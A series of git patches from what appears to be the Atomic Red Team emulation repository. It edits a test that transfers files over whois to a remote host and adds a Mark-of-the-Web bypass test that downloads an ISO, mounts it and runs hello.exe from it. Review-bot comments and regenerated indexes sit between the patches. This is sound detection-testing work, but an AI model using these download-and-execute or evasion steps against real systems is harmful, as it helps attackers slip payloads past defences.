From b7eee5a06d65a8c998d438a1a277c08ec44b03df Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Wed, 9 Jun 2021 16:02:14 -0600 Subject: [PATCH 20/84] preserving exit code if whois ends early --- atomics/T1105/T1105.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index b35c9434..9ce67778 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
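Review bot: The description does not say that something must be listening on `#{remote_host}:#{remote_port}` and answering the whois query with the file content; with the defaults (localhost, 8443) nothing is likely to answer, so the run presumably ends with a connection error and an empty `/tmp/T1105.whois.out`, which a reader of the test cannot tell from a successful transfer. I would extend the description to "Download a remote file using the whois utility. A service must be listening on #{remote_host}:#{remote_port} and return the file content in response to #{query}; with the default localhost:8443 nothing answers and the output file stays empty." so the prerequisite is visible where the inputs are documented. In the command, `output_file` is a path argument but is redirected unquoted; `> "#{output_file}"` keeps a path containing spaces from breaking the redirection. The `type` values (`String`, `Path`, `Integer`) are capitalised while the T1553.005 hunks on this page use lowercase `path`; I cannot see T1105.yaml's own convention from here, so check which form the index generator expects.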
@@ -377,6 +377,6 @@ atomic_tests:
 name: sh
 elevation_required: false
 command: |
- timeout #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
+ timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
 cleanup_command: |
 rm -f #{output_file}
From e70987c4391cb9818fafb6f0fa53b9feda24f40e Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Wed, 9 Jun 2021 22:44:21 -0500 Subject: [PATCH 21/84] T1553.005 (#1509) Co-authored-by: Toua Lor --- atomics/T1553.005/T1553.005.yaml | 36 +++++++++++++++++-- atomics/T1553.005/bin/FeelTheBurn.iso | Bin 0 -> 1179648 bytes atomics/T1553.005/{src => bin}/T1553.005.iso | Bin 3 files changed, 33 insertions(+), 3 deletions(-) create mode 100644 atomics/T1553.005/bin/FeelTheBurn.iso rename atomics/T1553.005/{src => bin}/T1553.005.iso (100%)
diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml
index 000674c5..63f1ffe5 100644
--- a/atomics/T1553.005/T1553.005.yaml
+++ b/atomics/T1553.005/T1553.005.yaml
@@ -11,7 +11,7 @@ atomic_tests:
 path_of_iso:
 description: Path to ISO file
 type: path
- default: PathToAtomicsFolder\T1553.005\src\T1553.005.iso
+ default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso
 dependency_executor_name: powershell
 dependencies:
 - description: |
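Review bot: `--preserve-status` is only checked for at run time: the test's prereq (outside this hunk, `which whois && which timeout`) proves that a `timeout` binary exists, not that it accepts this option, and the test lists macos as a supported platform where a stock system may have no `timeout` or a different implementation. If the installed `timeout` rejects the flag the command fails with a usage error before whois runs, which looks like a failed download rather than a missing prerequisite. A probe that exercises the flag would move that failure into the prereq step, for example `prereq_command: timeout --preserve-status 1 true && which whois`. The enclosing test definition starts before this hunk.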
@@ -20,11 +20,41 @@ atomic_tests:
 if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
 get_prereq_command: |
 New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
- Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}"
+ Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
 executor:
 command: |
 Mount-DiskImage -ImagePath "#{path_of_iso}"
 cleanup_command: |
- Dismount-DiskImage -ImagePath "#{path_of_iso}"
+ Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
 name: powershell
+- name: Mount an ISO image and run executable from the ISO
+ description: |-
+ Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO.
+ Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!".
+ ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,
+ supported_platforms:
+ - windows
+ input_arguments:
+ path_of_iso:
+ description: Path to ISO file
+ type: path
+ default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
+ prereq_command: |
+ if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
+ executor:
+ command: |
+ $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+ $driveLetter = ($keep | Get-Volume).DriveLetter
+ invoke-item "$($driveLetter):\hello.exe"
+ cleanup_command: |
+ Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+ Stop-process -name "hello" -Force -ErrorAction ignore
+ name: powershell
\ No newline at end of file
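Review bot: The new test's `cleanup_command` dismounts the image before stopping `hello`, yet hello.exe is started from the mounted volume, so the dismount presumably runs while the executable is still open from that drive and may fail or leave the image attached; stopping the process first makes the teardown reliable: `Stop-process -name "hello" -Force -ErrorAction ignore` then `Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null`. The last line of the description ends with a stray comma and runs the two URLs together ("by:https://…", "Reference:https://…"); a space after each colon and dropping the comma would keep the rendered docs readable. The file now ends without a trailing newline (`\ No newline at end of file`), which most YAML linters flag; add one. The `atomic_tests` list, and the first test this hunk also edits, start before the hunk.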
diff --git a/atomics/T1553.005/bin/FeelTheBurn.iso b/atomics/T1553.005/bin/FeelTheBurn.iso new file mode 100644 index 0000000000000000000000000000000000000000..491da79f9c138c767fe4bc93daa6746dda18a040 GIT binary patch literal 1179648 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 d)d^((UmR0q|1Z)1>dx0d1PBlyK%kev{{g8hV Date: Thu, 10 Jun 2021 03:44:49 +0000 Subject: [PATCH 22/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1553.005/T1553.005.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 
insertions(+) diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml index 63f1ffe5..e31b4c2a 100644 --- a/atomics/T1553.005/T1553.005.yaml +++ b/atomics/T1553.005/T1553.005.yaml @@ -29,6 +29,7 @@ atomic_tests: name: powershell - name: Mount an ISO image and run executable from the ISO + auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc description: |- Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 3e4f1628..f4ac635b 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -711,3 +711,4 @@ c33f3d80-5f04-419b-a13a-854d1cbdbf3a da4f751a-020b-40d7-b9ff-d433b7799803 c35ac4a8-19de-43af-b9f8-755da7e89c89 002cca30-4778-4891-878a-aaffcfa502fa +42f22b00-0242-4afc-a61b-0da05041f9cc From 733963824bcca645eed9d18002db10671d2eb12c Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 10 Jun 2021 03:44:56 +0000 Subject: [PATCH 23/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 42 ++++++++++++- atomics/T1553.005/T1553.005.md | 59 ++++++++++++++++++- 6 files changed, 99 insertions(+), 6 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 6e8aae4b..958c5b89 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -355,6 +355,7 @@ defense-evasion,T1078.003,Local Accounts,1,Create local account with admin privi defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell +defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 690fbfdb..4835de52 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -234,6 +234,7 @@ defense-evasion,T1078.003,Local Accounts,1,Create local account with admin privi defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell +defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index bfb8c069..c55b55ee 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -624,6 +624,7 @@ - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) - Atomic Test #1: Mount ISO image [windows] + - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows] - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] - Atomic Test #2: Creating W32Time similar named service using sc [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index e53dfb2f..eeb67747 100644 
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -441,6 +441,7 @@ - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) - Atomic Test #1: Mount ISO image [windows] + - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows] - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] - Atomic Test #2: Creating W32Time similar named service using sc [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index f0f057a6..382838e1 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -27232,7 +27232,7 @@ defense-evasion: path_of_iso: description: Path to ISO file type: path - default: PathToAtomicsFolder\T1553.005\src\T1553.005.iso + default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso dependency_executor_name: powershell dependencies: - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso}) 
@@ -27243,15 +27243,51 @@ defense-evasion: ' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null - Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" executor: command: 'Mount-DiskImage -ImagePath "#{path_of_iso}" ' - cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" + cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null ' name: powershell + - name: Mount an ISO image and run executable from the ISO + auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc + description: "Mounts an ISO image downloaded from internet to evade Mark-of-the-Web + and run hello.exe executable from the ISO. \nUpon successful execution, powershell + will download the .iso from the Atomic Red Team repo, mount the image, and + run the executable from the ISO image that will open command prompt echoing + \"Hello, World!\". 
\nISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 + Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, + \ " + supported_platforms: + - windows + input_arguments: + path_of_iso: + description: Path to ISO file + type: path + default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso + dependency_executor_name: powershell + dependencies: + - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) + +' + prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" + executor: + command: | + $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly + $driveLetter = ($keep | Get-Volume).DriveLetter + invoke-item "$($driveLetter):\hello.exe" + cleanup_command: | + Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null + Stop-process -name "hello" -Force -ErrorAction ignore + name: powershell T1036.004: technique: external_references: diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md index 